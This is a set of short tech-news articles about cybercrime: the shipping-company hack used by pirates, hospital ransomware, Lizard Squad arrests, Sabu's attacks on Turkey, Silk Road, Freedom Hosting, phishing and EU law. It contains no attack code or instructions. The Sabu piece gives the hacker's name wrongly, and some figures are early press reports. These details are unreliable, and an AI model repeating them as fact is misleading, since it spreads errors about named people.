Pirates Identify Booty by Hacking Shipping Company

When people talk about “pirates” and “hacking” together, it usually refers to those who release versions of software with the digital rights management systems removed or disabled. In this case, it was different. Revealed as part of Verizon’s 2015 Data Breach Investigation Report, Verizon’s RISK security response team were called in to assist a global shipping company who had fallen victim to network intrusions that were in turn used to assist in high-seas piracy.

The incident first came to light when the shipping company noticed an odd pattern in the attacks of pirates on their vessels. Instead of the typical approach of ransoming the crew and cargo of a target ship, the pirates instead operated hit-and-run attacks, seizing specific high-value shipping containers and making off with it alone.

The response team discovered that the shipping company had used a “homegrown” Web-based content management system to manage the content of their cargo ships. Upon analysis, it turned out that a malicious shell script had been uploaded to the server via a vulnerability in the software. The script gave the pirates backdoor access to the server, allowing them to upload and download files, including the bills of lading for the ships, as well as compromising a number of user passwords.

Mistakes made by the hackers allowed the hack to be uncovered easy by the response team, the primary one the script’s use of plain HTTP instead of making use of the server’s support for SSL encryption. This exposed every transmission of data to and from the server by the pirates when using the script. When put together, the team were able to see every command issued by the hackers, including a large number of spelling mistakes made in their commands. So while these cyber-attacks were certainly effective while paired with the physical attacks on the ships, those perpetrating the attacks were seemingly amateur. The biggest flaw in their hacks, however, was a complete disregard for operational security, using no proxies or other intermediaries, instead connecting directly from their home network. As a result, all it took to end the attack was the banning of the pirate hacker’s IP address.

Cyber-crime may be a serious threat in the world today, however, events like this have proven that attacks that combine both cyber and physical elements can be the most effective. Thankfully in this incident, the hackers proved themselves to have a level of incompetence that allowed them to be thwarted, but companies should be sure, more than ever, to defend themselves, not just in the physical world, but the online too.

Hackers Hit Hollywood Hospital With Ransomware

It seems that no system is beyond the reach of hackers out to line their own pockets. For almost an entire week, the Hollywood Presbyterian Memorial Medical Center has been without its computer systems, due to the system being taken down by a hack that is described as ransomware.

Without their computer systems, the staff at the hospital have been forced to switch back to pen and paper to take patient records and logs. More worrying is the inability to access medical records of patients which could heavily affect the care they receive. Those patients that require specific care, such as lab tests, scans or pharmacy tasks have been temporarily transferred to other nearby facilities as all of these are currently impaired by the hack.

The hack is currently under investigation by both the LAPD and FBI, however, there is yet to be any conclusive evidence about the culprit. The exact extent of the hack is currently unclear, but it is known that the attackers are demanding the sum of 9000 bitcoin, or around $3.5 million for the encryption key to regain access to the hospital systems. President and CEO at the hospital Allen Stefanek has come out stating that the attack was believed to be random and not maliciously directed at the facility.

It is shocking that a facility as important to the lives of many as a hospital can be affected by such a hack, with no backups available or a swifter way of tackling the issue. This could come as a wake-up call to other hospitals to toughen up their cyber security, or they could befall the same fate and put the lives of their patients at risk.

Six Arrested in Lizard Squad Crackdown

Six people in the UK have been arrested for using Lizard Squad’s infamous DDoS tool, Lizard Stresser. Operation Vivarium, co-ordinated by the National Crime Agency (NCA), was a nationwide initiative involving numerous police forces and Regional Organised Crime Units (ROCUs) across the UK. It is estimated that 30% of UK businesses suffered DDoS attacks last year.

According to the NCA website, the following suspects, all male and aged 18 or under, were arrested:

A 17 year-old male from Manchester had computer equipment seized and was interviewed under caution by the NCA’s National Cyber Crime Unit (NCCU) on 27 August.

A 18 year-old-male from Huddersfield arrested and bailed on 27 August by Yorkshire and Humberside police.

A 18 year-old-male from Milton Keynes interviewed under caution by the South East ROCU on 26 August.

A 18 year-old male from Manchester arrested and bailed by North West ROCU and Greater Manchester Police on 26 August.

A 16 year-old male from Northampton arrested and bailed by East Midlands ROCU on 26 August.

A 15 year-old male from Stockport arrested by the North West ROCU and Greater Manchester Police on 24 August.

This follows two other arrests earlier this year:

  • A 17 year-old male from Cardiff arrested and bailed by South Wales ROCU and NCCU on 16 April.
  • A 17 year-old male from Northolt arrested and bailed by the Metropolitan Police on 03 March.

“By paying a comparatively small fee, tools like Lizard Stresser can cripple businesses financially and deprive people of access to important information and public services, Tony Adams, Head of Investigations at the NCA’s National Cyber Crime Unit, said. “This multi-agency operation illustrates the commitment of the NCA and its partners to pursuing people who think they can criminally disrupt important public services or legitimate businesses.”

“One of our key priorities is to engage with those on the fringes of cyber criminality, to help them understand the consequences of cyber crime and how they can channel their abilities into productive and lucrative legitimate careers,” he added.

Thank you National Crime Agency for providing us with this information.

Image courtesy of Forbes.

FBI Informant Leads Attacks on Turkish Government

A hacker who turned to being an FBI informant in order to avoid prison has been leading cyber attacks on Turkey.

Hector Xavier Montague, or better know under the alias Sabu, has been working with the FBI since his arrest in 2011 after being charged for cyber crimes. Sabu was looking at getting 20 years in prison but was able to make a deal. During this time Sabu has managed to stop over 300 cyber crimes and also take down 8 of the world’s biggest hackers from anonymous.

Now it seems that he has also been targeting the Turkish government whilst under US supervision. Court documents show that his hacking group, Antisec, teamed up with Redhack, a politically motivated Turkish group. Sabu apparently led the attacks and even recruited Jeremy Hammond who is number one on the FBI cyber crime list. Chat records show Sabu asking Hammond to take down a number of government websites, and to forward any access to Redhack.

When Hammond was able to access the details to more than 10 Turkish government servers, he handed all the details to a Redhack member saying: “Get into the boxes and do what you do”.

The FBI are insisting that all of this was done under the attorney general’s guidelines, but Sabu has been given a one year supervision order for his part and Hammond has been given 10years in prison.

Thanks to Sky for supplying us with this information.

Image courtesy of Tap Scape

“Oleg Pliss” Apple iPhone Hack Spreads To the USA, UK and New Zealand

On the back of yesterday’s news that Australian Apple Devices were getting hijacked through the ‘Find my iPhone’ feature it turns out that the problem is significantly more widespread than first reported. The ‘Oleg Pliss’ ransomware demands a $100/€100 ransom payment in order to unlock your device. The number of users affected by the issue is growing rapidly with a thread about the issue on the Apple forums currently at 23 pages, with 333 replies and 29570 views. The problem is now confirmed to have affected iPhone users across the anglophone world in the USA, the United Kingdom, New Zealand and of course Australia.

The Oleg Pliss ransomware is believed to have been born out of a batch phising email sent to iOS and OS X users. That phishing email is believed to have been used to harvest important account details from Apple account holders which then allowed the cyber criminals to hack many devices and start demanding ransoms in return for device unlocks. Of course it goes without saying that all users affected by the issue are advised not to pay the ransom because there is no guarantee the cyber criminals would unlock your phone, and even if they did your phone is still infected so they could demand another ransom again at any time. Apple recommends that all Apple Account users affected by the issue should change their passwords immediately.

Image courtesy of Engadget

Microsoft Cold Call Virus Scammer Jailed

If you haven’t had one of those stupid phone calls telling you your computer has a virus, I bet you’ve at least heard from a friend or relative that has. Personally, I have had a couple and they’re great fun for trolling them right back, so long as you understand that it is a scam in the first place.

The scam is that they cold call people and tell them they’ve found a virus on their computer, ask you to pay them money which in this case was between £35 and £150 to remove it. They would then give you access to software that would remove the virus. The scam here is two fold, not only does this give them a way to access your computer and payment details, but also the software they’re providing you is freely available from Microsoft.

Mohammed Khalid Jamil, 34, from Luton hired people in an Indian call centre to operate this scam. As the head of one of many similar scams Jamil was caught in the act and this week was sentenced, receiving a four month suspended jail sentence, ordered to pay a £5,000 fine, £5,665 compensation and £13,929 in prosecution costs.

“We believe it may be the first ever successful prosecution of someone involved in the Microsoft scam in the UK,” said Lord Harris, chairman of the National Trading Standards Board. “It’s an important turning point for UK consumers who have been plagued by this scam, or variants of it, for several years. Many have succumbed to it, parting with significant sums of money, their computers have been compromised and their personal details have been put at risk. Now that one of the many individuals who’ve been operating this scam has been brought to justice, it’s a stark warning to anyone else still doing it that they can be caught and will be prosecuted.”

Unfortunately we doubt this is the end of such scams, but hopefully it will shed light on the scam so that less people fall for it in the future.

Thank you BBC for providing us with this information.

Image courtesy of Electricpig.

Criminals Can Recover Personal Details From Used Phones, Even After Factory Reset

A recent Channel 4 investigation into the used phone trade in the UK has exposed some worrying privacy concerns. An investigation into two of the largest pawn brokers that are selling second-hand phones, CEX and Cash Converters, revealed that many phones still have recoverable details on them once sold. Some of the data that is left behind on the devices, or is recoverable, includes photos, text messages, passwords, credit card information and internet history. This comes despite Cash Converters and CEX telling customers that their devices will be wiped clean of all personal data before they are sold.

The issue arises from the assumption by these companies that a “factory reset”, or something of that equivalence, is enough to wipe all personal data from the device. The reality is a factory reset doesn’t completely eradicate all personal data as it is still recoverable from the memory. One security expert that Channel 4 spoke to claims that data can be easily recovered using freely available software and about 10 minutes of your time.

“The phones look like they’re completely blank, but the data is still there in the memory,” said Glenn Wilkinson of SensePost. “You can use software to find it, and that software is freely available for download. I can teach you how to access the data in 10 minutes.”

The extent of information that people store on their phones means that for criminals and fraudsters second hand phones are a goldmine of valuable and sensitive private information.

The Chief Executive of one of the major pawn brokers, Cash Converters, stated that:

“All phones are wiped to a standard level and full factory restores are carried out,” said Mr Patrick. “It is our understanding that specialist software may still be able to recover certain information stored on the phone, but we do everything in our power to ensure all personal data is removed from the device.”

However, the clear moral of the story is that if you’re selling your phone make sure you have securely removed all your data to the best of your ability. In some cases the manufacturer reset function will be enough but in others it may not and specialist data removal software may be needed.

Image courtesy of the Guardian

Ross Ulbricht, Alleged Creator Of Silk Road, Pleads Not Guilty To All Charges

Alleged founder and manager of the Bitcoin based black-market website Silk Road, Ross Ulbricht, reportedly pleaded not guilty to all charges raised against him by the US government. The charges against Mr Ulbricht are incredibly serious including trafficking in narcotics, computer hacking, money laundering and engaging in continuing criminal enterprise. The “continuing criminal enterprise” charge is often reserved for the largest Mafia/Cartel-like bosses.

Previous speculation had suggested that Ross Ulbricht would cooperate with his prosecutors for a more lenient sentence by facilitating the arrest and prosecution of other figures in the “dark web” drug industry he was apparently a key figure in. This speculation was based on the recent arrest of three more alleged Silk Road employees in December and the arrest of Bitcoin foundation Vice Chairman Charlie Shrem last month, who was charged with money laundering related to Silk Road.

Mr Ulbricht’s trial isn’t due to take place until November 2014 and in the mean time the defence and prosecution will be able to review are prepare their evidence for the expected 4 to 6 week trial. Ross Ulbricht’s defence is expected to attack the enforcement methods used by the prosecution citing illegal or improper surveillance techniques.

More details can be found here.

Image courtesy of Ross Ulbricht (Google +) 

FBI Seizes Record 144,336 Bitcoins – Worth $28 Million

RT reports that the FBI have just made their biggest seizure of bitcoins to date, a staggering 144,336 worth an estimated $28 million at current market value. The FBI claim to have seized the “secret stash” of bitcoins belonging to the Silk Road online marketplace founder and owner. The bitcoins apparently belonged to “Dread Pirate Roberts”, which was Ross Ulbricht’s alias on the Silk Road marketplace. In the 2 years of Silk Road’s operation $1.2 billion is estimated to have been traded in bitcoin of which Silk Road charged between 8 and 15% commission.

It is claimed that despite the FBI having seized hundreds of thousands of bitcoins from shutting down the Silk Road operation it still cannot use those bitcoins. This is because the FBI currently lacks the password to the encrypted wallet needed to access them. Ulbricht’s $80 million of personal wealth in bitcoins thus remain inaccessible to the FBI, protecting the value and integrity of the currency from intervention by authorities (for the time being at least).

Image courtesy of George Frey/Getty Images/AFP

Cryptic Software And Bournemouth University Team Up To Train Students In Cyber Security

Cyber Security is becoming an increasing concern for everyone; businesses, schools, hospitals, governments and even the everyday home user. That’s why we were quite interested to see security company Cryptic Software teaming up with Bournemouth University to offer students a chance to train and work in the field of Cyber Security while taking related degrees there – namely the BSc in Digital Forensics and Security.

As part of the joint-venture Bournemouth University will get access to £500,000 worth of computer hardware and software to set up a special Cyber Security unit. £250,000 of which is provided by the UK government’s Higher Education Innovation Fund (HEIF).

The Cyber Security unit is set to be profitable too as Bournemouth University is expected to earn £250,000 in the first year on consultancy work, rising to £3 million by the end of the third year. With Cyber Crime costing the UK around £27 billion the state of the art research that is to be undertaken at Bournemouth University in partnership with Cryptic is going to be essential for securing international competitiveness for UK firms in the online services industry.

Image courtesy of Bournemouth University 

The FBI Admits It Controlled Freedom Hosting Tor Servers

Wired reports that the FBI has admitted to hacking into Freedom Hosting and taking control of it. Freedom Hosting was a Tor powered hosting network that was shut down about 6 weeks ago and infected with user-identification malware. Since the malware did nothing other than identify users to certain child pornography websites speculation suggested that the FBI was behind the hacking and was using it to identify criminals for prosecution. 6 weeks later and it appears that speculation was true.

At the same time as this happened Freedom Hosting’s reported owner Eric Eoin Marques was arrested in Ireland and is currently awaiting extradition to the USA where he faces up to 100 years in prison for the charges brought against him which include facilitating child pornography and abuse websites. He has already been denied two bail requests as he is believed to be a flight risk by the Irish authorities. Eric Eoin Marques has apparently already sent the earnings of his profitable Freedom Hosting business to his girlfriend over in Romania.

Image courtesy of Tor

Russian Botnet Taking Over Tor Network, Now Accounts For 80% Of Users

Reports suggest that a Russian Botnet has managed to infiltrate and flood the Tor network. The number of Tor users has been slowly rising as people look to protect themselves from government surveillance and take more consideration for their own privacy but an increase of over 2 million users in less than a month is looking very strange. Apparently the reason for this is that most of these 2 million new users are nodes in a Russian Botnet. The Botnet apparently isn’t new either and is switching to Tor for communication with its command and control centre to make the location of the central servers much more difficult to discover.

Why would it want to hide its central servers? Well the Russian Botnet is probably actively involved in cyber crime of some nature – clickfraud, stealing bank account details, server ransomware and the like. By shielding and protecting the location of its central servers it makes it difficult for any police services to locate them and shut them down. Whether it is possible for the Tor network to be over-loaded with these Botnet nodes is another matter. I am sure we will find out in the coming weeks what the consequences of it are.

Image courtesy of Tor Project

41% Of Online Fraud Victims Never Recover Lost Funds Says Kaspersky Report

According to a recent Kaspersky Labs report and survey, things do not look good for online fraud victims. Apparently 41% of victims did not recover any of the lost funds while 45% recovered them all and 14% partially recovered them. 33% of victims had the money stolen during an e-Payment checkout operation, 17% during online banking sessions and 13% while online shopping.

Sadly only 12% of online store customers who were defrauded received full compensation, for online banking the figure was 15%. Of course Kaspersky Labs says that this means only one thing – that companies, consumers and businesses should all take more care in using appropriate protection when dealing with money online.

As expected the majority of consumers assume that their bank or retailer is responsible for protecting them. 34% of respondents take no security measures when using public WiFi while 45% believe the bank will return any stolen money. Despite the relative prevalence of these incidents, around 62% of respondents experienced an incident where attempts to steal financial details were encountered, the average cost of an attack was only about $74 per person.

Image courtesy of Kaspersky Labs

German Security Provider Says 750 PayPal Phishing Sites Are Created Daily

PayPal phishing schemes drive me mad. I probably get about 5-10 emails everyday across my various work and personal email accounts from phishing sites trying to trick me into handing over PayPal details. A German email security provider has shed light on why this is such a frequent occurrence. Apparently everyday an average of 750 new PayPal phishing sites are set up. By simple math that means we see 22,000 of these rotten things every month and 270,000 in the average year.

Most of these Phishing pages are hosted on legitimate websites that have been compromised by cybercriminals so spotting a phishing site may not often be as obvious as you think, although if it isn’t on PayPal.com then it should be pretty obvious.

“The online payment service PayPal is not only one of the most popular online payment methods, but also a preferred target for phishers: PayPal regularly tops the lists of phishing topics worldwide. Every day, an average of 750 newly compromised websites are targeted primarily at PayPal users, according to numbers from Commtouch’s GlobalView URL filtering database – resulting in more than 22,000 new sites per month and 270,000 sites per year. The sites are usually legitimate websites that are compromised through security flaws. The findings highlight the need for hosters and website owners to protect their sites and for users to deploy an effective Web security solution.” Stated Eleven Research.

Image courtesy of Eleven Research

Tor Powered “Freedom Hosting” Goes Offline From Hacking, Operator Arrested

The Tor service is well known throughout the world as a safe and private networking service that uses other members on the network to protect the identity of everyone. However, Tor has been exploited for illegal purposes – such as for use by criminal organisations and for viewing illegal content. The hosting company “freedom hosting” sits at the centre of one of the most famous and long running incidents. Freedom hosting has been associated with hosting a whole variety of bad stuff, such as child pornography, and over the years it has been hacked numerous times by Anonymous and other hacktivist groups for the illegal and immoral content it hosts. Freedom hosting is not in any way associated with the founders of Tor but exploits the public Tor service.

Just recently the Tor network saw the disappearance of a large number of service addresses. These addresses disappeared at the same time Eric Eoin Marques (Freedom Hosting’s owner) was arrested in Ireland on an American arrest warrant issued in Maryland according to the Irish Examiner. The Tor organisation have already publicly disassociated themselves from Freedom Hosting. In addition to Freedom Hosting’s owner/operator being arrested, the site was also hacked to redirect visitors to the child pornography website to an IP harvesting website. This has led many to believe the FBI is behind the attack and used the hack to reveal the identity of users to the illegal website.

Image courtesy of Tor

EU Adopts Tough Anti-Cybercrime Legislation

Cybercrime is a growing problem of the modern age and on Thursday the European Parliament adopted a new set of rules to fight cybercrime with a more tough stance. The new measures came in with a majority vote of 541 for and 91 against and all EU nations must adopt these new laws within 2 years.

The new directive states that cybercriminals who interfere with data and information systems, or intercept communications and sell hacking tools, will face at least two years in prison. Attacks against serious infrastructure that cause serious damage will be met with a minimum of 5 years while Botnet creators will face a minimum of 3 years.

Furthermore inter-state cooperation is designed to be improved and member states are being told to collect cyberattack statistics and have the relevant authorities to process such data and respond to attacks.

“This is an important step to boost Europe’s defences against cyber-attacks. Attacks against information systems pose a growing challenge to businesses, governments and citizens alike. Such attacks can cause serious damage and undermine users’ confidence in the safety and reliability of the Internet” said Cecilia Malmström, EU Commissioner of Home Affairs.

Image courtesy of capreform.eu